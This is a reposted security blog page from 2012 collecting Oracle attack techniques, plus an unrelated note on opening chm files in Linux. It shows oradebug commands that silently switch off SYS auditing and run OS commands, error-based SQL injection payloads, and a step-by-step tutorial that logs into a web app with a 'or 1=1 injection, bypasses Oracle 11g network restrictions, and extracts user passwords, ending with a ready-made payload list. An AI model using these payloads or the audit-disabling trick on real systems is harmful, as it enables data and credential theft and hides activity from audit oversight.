Thursday, 31 May 2012

Disable Auditing and running OS commands using oradebug


Disable Auditing and running OS commands using oradebug



Currently I am staying at the Hacktivity 2011 conference in Budapest. I talked about Oracle Forensics (pdf of the presentation).The second talk was given by Laszlo Toth.  He showed at lot of interesting things, e.g. how to disable Oracle Audit and SYS Auditing using oradebug. His presentation will be available soon on his sooner or later webpage soonerorlater.hu.
oradebug is an undocumented (from Oracle) feature in all versions of Oracle which allows powerful activities if you have SYSDBA privileges (and getting SYSDBA privileges is easy as DBA). The peek/poke statement allows to read/modify the memory of the database:
Sample - disable Oracle SYS Auditing:


sqlplus / as sysdba

SQL> — get the offset for oradebug
SQL> select fsv.KSMFSNAM,sga.*
from x$ksmfsv fsv, x$ksmmem sga
where sga.addr=fsv.KSMFSADR
and fsv.ksmfsnam like ‘kzaflg_%’;
KSMFSNAM ADDR INDX INST_ID KSMMMVAL
—————- ———- ———- —————-
kzaflg_ 0000000060031BB0 26652 1 0000000000000001
SQL> show parameter audit;
NAME TYPE VALUE
———————————— ———– ——————————
audit_file_dest string /u01/app/oracle/admin/PSALES/adump
audit_sys_operations boolean TRUE
audit_syslog_level string
audit_trail string DB, EXTENDED
SQL> oradebug poke 0×60031bb0 1 0
BEFORE: [060031BB0, 060031BB4) = 00000001
AFTER: [060031BB0, 060031BB4) = 00000000
oradebug can also be used to disable standard auditing. oradebug makes Oracle products like Oracle Auditvault nearly useless because Oracle Auditvault relies on Oracle native auditing. A (SYS)DBA can switch off auditing for a few seconds, do activities without being audited and switch auditing on again. .
Another trick from Laszlo’s presentation was how to use oradebug to call OS commands via the database
SQL> oradebug call system “ls -la >/tmp/hacktivity.txt”
Later I will talk about Laszlo’s trick how to disable the Oracle authentication using oradebug.

2 new ways to create error messages

25 Feb 2010 von Alexander Kornbrust.



Today I came across a nice blog article “Methods of quick exploitation of blind SQL Injection Vulnerabilities in Oracle” from Dmitry Evteev about new techniques which can be used in error-based SQL injection. One of the comments contains an additional technique. Even if the title of the blog is not correct for Oracle (it’s not blind SQL Injection it’s error based which is a small but important difference) the idea itself is nice. Sometimes the SQL statements are more complicated than necessary.
Using error messages of XMLType:
The XMLType allows to create error messages containing custom strings (like database users, passwords, …). The string must start with a ‘<:’ that’s why we have to concatenate  ‘<:’  to the string.  Additionally the all spaces and at-signs must be replaced.
SQL> select XMLType((’<:’||user||’>’)) from dual;
ERROR:
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00110: Warning: invalid QName “:SYS” (not a Name)
Error at line 1
ORA-06512: at “SYS.XMLTYPE”, line 0
ORA-06512: at line 1
SQL> select XMLType((’<:’||replace((select banner from v$version where rownum=1) ,’ ‘,”)||’>’)) from dual;
ERROR:
19
ORA-19202: Error occurred in XML processing
LPX-00110: Warning: invalid QName
:Oracle9iEnterpriseEditionRelease9.2.0.8.0-Production” (not a Name)
Error at line 1
ORA-06512: at “SYS.XMLTYPE”, line 0
ORA-06512: at line 1
This can be used in an SQL Injection statement:
or 1=length(XMLType((’<:’||replace((select banner from v$version where rownum=1) ,’ ‘,”)||’>’)))–
The second technique is mentioned in the comments: 
SQL> select extractvalue(xmltype(’<x/>’),’/$’||(SELECT banner FROM v$version where rownum=1)) from dual;
*
ERROR at line 1:
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00601: Invalid token in: ‘/$Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product
 This can be used in an SQL Injection statement:
or 1=length(extractvalue(xmltype(’<x/>’),’/$’||(SELECT banner FROM v$version where rownum=1)))–

New SQL Injection Whitepaper (for SQL Server)



 Daniel Kachakil released an interesting whitepaper about fast data extraction using SQL Injection and XML statements on SQL server and a tool implementing this technique called SFX-SQLI.
The paper describes how to retrieve data from a SQL Server database using SQL Injection and XML. This technique is not new (for me). I am using such techniques in the Oracle environment via xmltransform or stragg since a while. It is possible to retrieve the entire content of a table in a single error message…
More details will be available on the SQL Injection book I am currently writing with some other security researchers…
The tool SFX-SQLI implements the concept for SQL Server.
Here is one of the examples how to export an entire table, e.g. via utl_inaddr. The output is limited to 4000 byte:
or 1= utl_inaddr.get_host_name((select xmltransform(sys_xmlagg(sys_xmlgen(username)),xmltype(’< ?xml version=”1.0″?> ;
‘)).getstringval() listagg from all_users))–
Warning: ociexecute(): OCIStmtExecute: ORA-29257: host CUSTCOM_PROD;WEBTOOL;WEBDB;NELLDB;ERDB;B2B;BI;PM;SH;IX;OE;HR;SCOTT;MGMT_VIEW;MDDATA;SYSMAN;MDSYS;SI_INFORMTN_SCHEMA;ORDPLUGINS;ORDSYS;OLAPSYS;ANONYMOUS;XDB;CTXSYS;EXFSYS;WMSYS;DBSNMP;TSMSYS;DIP;OUTLN;SYSTEM;SYS; unknown ORA-06512: at “SYS.UTL_INADDR”, line 4 ORA-06512: at “SYS.UTL_INADDR”, line 35


Author: Alexander Kornbrust

Tutorial: Oracle SQL Injection in Webapps - Part I


This blog entry will show a SQL Injection example based on a JSP application (tnx to Slavik) and Oracle 11.1.0.7. An Oracle SQL Injection Cheat Sheet is available on our webpage.
With Oracle 11g, Oracle introduced some  security enhancements by default, e.g. the ACL for PLSQL packages accessing the network. These packages are UTL_HTTP, UTL_INADDR, UTL_TCP, … Some old well known tricks like the usage of utl_inaddr are no longer working for non-DBAs in 11g… The following tutorial will show how to bypass these restrictions and will show some new tricks…
First we start with with a vulnerable webapp:
Oracle SQL Injection Picture 1
In this webapp we can login to an employee directory. If we try to guess a valid combination, e.g. scott / tiger we are getting an error message
Oracle SQL Injection
OK, let’s try to use a single quote ‘ as a user login. And BANG - ERROR
Oracle SQL Injection Picture 3
“ORA-01756 - Anführungsstrich fehlt bei Zeichenfolge”.
If you do not speak german, you can lookup in google for the english translation of this error message. This is not uncommon to receive an error message in a foreign language (if you work internationally).
There are several website so I take the first finding. The translation is “ORA-01756: quoted string not properly terminated”. This is a  common error message of a SQL Injection vulnerability.
A typical SQL Injection string is
‘ or 1=1–
If we use this string, we are getting the following result:
Oracle SQL Injection Picture 4
By using ‘ or 1=1– we successfully logged on into the system. But we are interested in the data not in the account of the webapp.
Oracle SQL Injection Picture 5
We are able to inject our own code. This page does not return data from the database so the usage of UNION SELECT is not an option.
But what are now the next steps?
1. Enumeration of the database:
Let’s find out the version number of the Oracle database:
Now we try to inject the following command in the login field
‘ or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))–
Oracle SQL Injection Picture 6
Again an ORA-01756 error. This time it is a different problem. The field for the login  is limited to 50 characters but our string we are injecting is longer. That’s why we are converting the POSTs to GETs.
The webdeveloper plugin for firefox can do this (+ many other different ways like saving the webpage locally, removing restrictions online, …).
After doing the conversion from POSTs to GETs we can modify the injected string in the URL:
Oracle SQL Injection Picture 8
Again we are getting a german error message:
ORA-24247 Netzwerkzugriff von Access Control List (ACL) abgelehnt.
A quick lookup shows the english translation:
ORA-24247  network access denied by access control list (ACL)
OK, the default hardening from Oracle is working. We are not able to send information via DNS or create a specially crafted error message using utl_inaddr.
I was looking for an alternative and I found the following function :
ctxsys.drithsx.sn
So we replace utl_inaddr with ctxsys.drithsx.sn (+ and one additional parameter).
Our new injection is looks like:
‘ or 1=ctxsys.drithsx.sn(1,(select banner from v$version where rownum=1))–
After injection this we are getting the following error message
Oracle SQL Injection Picture 9
ORA-20000: Oracle Text-Fehler
DRG-11701: Thesaurus Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production ist nicht vorhanden
The error message contains the Database version. The reason for this behaviour is our injected string contains the result of the query  (select banner from v$version where rownum=1) in the error message. This query returns the first row of v$version.
Injecting error messages is normally limited to 1 column and 1 row. The limitation of 1 column can be bypassed using the string concatenation || (col1||col2). To bypass the limitation of multiple rows, most pentesters enumerate through the various columns using the  rownum.
But Oracle 11g offers a new function: stragg
This functions can convert multiple rows into a single row. In one of the next tutorial I will show how to do this in Oracle 9 and 10.  We can now use the function stragg to get all columns in the error message:
‘ or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct banner)||’ ‘ from v$version))–
Oracle SQL Injection Picture 9a
Now we have everything to retrieve all data (according to our privileges) from the database
Let’s see what privileges we have
‘ or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct granted_role||’;') from user_role_privs))–
Oracle SQL Injection Picture 10
We have CONNECT and RESOURCE role.
The next step is to get all tables with a password column:
‘ or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct owner||’.'||table_name||’['||data_type||’];’) from all_tab_columns where column_name=’PASSWORD’))–
Oracle SQL Injection Picture 11
There is a table called SHOP.SHOPUSER. We are now using the following command to extract all passwords from this table.
‘ or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct password||’;') from shop.shopuser))–
Oracle SQL Injection Picture 12
Using this approach we can retrieve all table content without using UNION SELECT from the table.
SUMMARY of the used injected commands:
‘ or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))–
‘ or 1=utl_inaddr.get_host_address((select sys.stragg(distinct granted_role||’;') from user_role_privs))–
‘ or 1=utl_inaddr.get_host_address((select sys.stragg(distinct owner||’.'||table_name||’['||data_type||’];’) from all_tab_columns where column_name=’PASSWORD’))–
‘ or 1=utl_inaddr.get_host_address((select sys.stragg(distinct password||’;') from shop.shopuser))–

Wednesday, 30 May 2012

How to Execute chm files in Linux

download the following rpms on ur pc:-

http://dag.wieers.com/packages/chmlib/chmlib-0.35-1.1.fc3.rf.i386.rpm
ftp://rpmfind.net/linux/dag/fedora/3/en/i386/dag/RPMS/wxGTK-2.4.2-5.1.fc3.rf.i386.rpm
http://acmserver.cs.ucr.edu/%7Ensoracco/rpms/xchm-0.9.8-1.i386.rpm

and also install them in the same sequence. using the command:-

rpm -ivh <package name>

Note:- i am giving the path of packages for fedora cpre 3. if want for any other os take a look at the following sites.

chmlib:- http://dag.wieers.com/packages/chmlib/
wxGTK:- ftp://rpmfind.net/linux/dag/
xchm: - platform independent for all redhat's.............

Sql Injection (Dork list)

This summary is not available. Please click here to view the post.